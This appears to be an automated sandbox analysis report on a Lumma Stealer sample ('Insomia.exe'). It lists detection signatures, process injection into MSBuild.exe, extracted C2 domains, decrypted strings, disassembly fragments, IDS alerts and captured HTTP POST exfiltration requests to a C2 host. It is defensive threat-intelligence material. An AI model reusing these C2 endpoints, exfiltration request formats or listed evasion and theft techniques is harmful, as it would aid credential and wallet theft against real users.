Edit tour

Windows Analysis Report
Insomia.exe

Overview

General Information

Sample name:	Insomia.exe
Analysis ID:	1584538
MD5:	7f3bcf6644fd8551a83cc1f4bf126c4f
SHA1:	3c6a6763d27860dae7087b92dbf02a07d1bdfb6c
SHA256:	e8cbb5212a46cf5f4962e91e955b71891ffbb3477bef67d92c0949e03c4cb40b
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to modify clipboard data

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Insomia.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\Insomia.exe" MD5: 7F3BCF6644FD8551A83CC1F4BF126C4F)

MSBuild.exe (PID: 7100 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abruptyopsn.shop", "rabidcowse.shop", "nearycrepso.shop", "tirepublicerj.shop", "cloudewahsj.shop", "impossiblekdo.click", "wholersorie.shop", "framekgirus.shop", "noisycuttej.shop"], "Build id": "LPnhqo--ohdbkoygvvee"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2131556246.00000000060D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Insomia.exe PID: 6572	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Insomia.exe PID: 6572	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 7100	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Insomia.exe.60d0000.8.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Insomia.exe.60d0000.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7100, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:38:08.595192+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	188.114.97.3	443	TCP
2025-01-05T19:38:09.550373+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	188.114.97.3	443	TCP
2025-01-05T19:38:10.858773+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	188.114.97.3	443	TCP
2025-01-05T19:38:11.920830+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	188.114.97.3	443	TCP
2025-01-05T19:38:13.008492+0100	2028371	3	Unknown Traffic	192.168.2.5	49711	188.114.97.3	443	TCP
2025-01-05T19:38:14.168234+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	188.114.97.3	443	TCP
2025-01-05T19:38:15.402133+0100	2028371	3	Unknown Traffic	192.168.2.5	49717	188.114.97.3	443	TCP
2025-01-05T19:38:17.505331+0100	2028371	3	Unknown Traffic	192.168.2.5	49719	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:38:09.073077+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49707	188.114.97.3	443	TCP
2025-01-05T19:38:10.036343+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49708	188.114.97.3	443	TCP
2025-01-05T19:38:18.011775+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49719	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:38:09.073077+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49707	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:38:10.036343+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49708	188.114.97.3	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T19:38:14.600117+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49713	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 2.2.MSBuild.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "rabidcowse.shop", "nearycrepso.shop", "tirepublicerj.shop", "cloudewahsj.shop", "impossiblekdo.click", "wholersorie.shop", "framekgirus.shop", "noisycuttej.shop"], "Build id": "LPnhqo--ohdbkoygvvee"}

Multi AV Scanner detection for submitted file

Source: Insomia.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: Insomia.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: impossiblekdo.click
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.3269692279.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: LPnhqo--ohdbkoygvvee

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00419B52 CryptUnprotectData,

2_2_00419B52

Source: Insomia.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.2

Source: Insomia.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004411000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2132102328.0000000006220000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004411000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2132102328.0000000006220000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Insomia.exe	Code function: 4x nop then jmp 05EF3B7Ch	0_2_05EF3960
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 4x nop then jmp 05EF3B7Ch	0_2_05EF3950
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_060BDA90
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 4x nop then jmp 061BC938h	0_2_061BC878
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 4x nop then jmp 061BC938h	0_2_061BC880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, esi	2_2_0040A01E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, esi	2_2_0040A01E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+edx-774985F5h]	2_2_0040A2AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx+08h]	2_2_0043CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_0042FCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0042FCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+00000870h]	2_2_0040CFC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, eax	2_2_0040CFC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-0Ch]	2_2_0040AFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_00430850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx-250B3304h]	2_2_0042A860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00439060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-18h]	2_2_00409000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0042F0C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	2_2_0042B8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_004308B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	2_2_00444140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_0041B160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp cx, dx	2_2_0043E101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, word ptr [edx]	2_2_0043E101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-33h]	2_2_0043E101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then push ebx	2_2_0043D900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esi+0Ch], edi	2_2_00419102
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_00419102
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov esi, eax	2_2_0042810F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-47E0A278h]	2_2_00440110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0042F131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+5DB13D3Dh]	2_2_0040A9D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then push edi	2_2_004311E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004219E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+74h]	2_2_00409AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	2_2_00409AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0041BC81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx-57DA02B1h]	2_2_004092F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, eax	2_2_00405AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebp, eax	2_2_00405AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, dword ptr [esi+1Ch]	2_2_0041C34B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_0041C34B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edx], cl	2_2_0041C34B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	2_2_0042B8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-12BF32F3h]	2_2_0042EB92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [ebx+ecx+23h], 00000000h	2_2_0040ABA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esi+14h], 00000000h	2_2_0040B460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_0042C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_0042DC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_00415C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edi, eax	2_2_0042E4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	2_2_00428CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp cl, 0000002Eh	2_2_00428CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, word ptr [eax]	2_2_004274F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, word ptr [esi]	2_2_004274F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-39h]	2_2_0041DC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, ebx	2_2_0041DC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_00417485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	2_2_00440490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [eax+ecx-5999E81Dh]	2_2_004414B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_0041B4B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_0041B56E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+ecx*8], F68AC6D1h	2_2_00416517
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, ebx	2_2_00416517
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then test esi, esi	2_2_0043DD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	2_2_0041FDE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_00407610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_00407610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_004156F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	2_2_004156F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-24138560h]	2_2_00443E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	2_2_0041E700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_004307F7

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49708 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49713 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49719 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49707 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: impossiblekdo.click
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N2IA27ZY6QCWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12806Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QUR1YTWRHZ9SURB2S8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15084Host: impossiblekdo.click
